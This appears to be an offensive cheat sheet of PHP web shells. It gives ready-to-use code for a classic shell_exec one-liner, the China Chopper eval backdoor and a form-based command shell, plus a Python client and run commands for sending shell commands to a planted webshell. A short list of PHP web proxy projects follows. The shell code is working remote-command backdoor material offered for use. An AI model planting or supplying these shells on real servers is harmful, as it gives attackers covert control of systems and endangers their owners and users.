WEB SHELLS
Classic
<?php echo shell_exec($_GET["cmd"]);?>
China Chopper
<?php @eval($_POST['password']);?>
Web Shell with UI
<html><body><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form> <pre><?php if(isset($_GET['cmd'])) { system($_GET['cmd']); }?></pre></body></html>
CLIENT HANDLER FOR A WEB-SHELL
#!/usr/bin/env python3 import sys import requests if len(sys.argv) > 1: url = sys.argv[1] else: url = input("Enter the URL of the PHP webshell: ") while True: cmd = input("$ ") if cmd == "exit": break response = requests.get(url, params={"cmd": cmd}) print(response.text)
chmod +x webshell-client.py sudo ./webshell-client.py http://200.200.200.200/path/webshell.php
WEB PROXY
Open source options:
- PHPProxy (discontinued) – Source code available at [Link].
- PHP-Proxy – Source code available at [Link].
- Glype – Source code available at [Link].
- PHP Web Proxy – Source code available at [Link].
Free open web proxies:
- Free Proxy – Online at [Link].
PROXY SERVERS IN PHP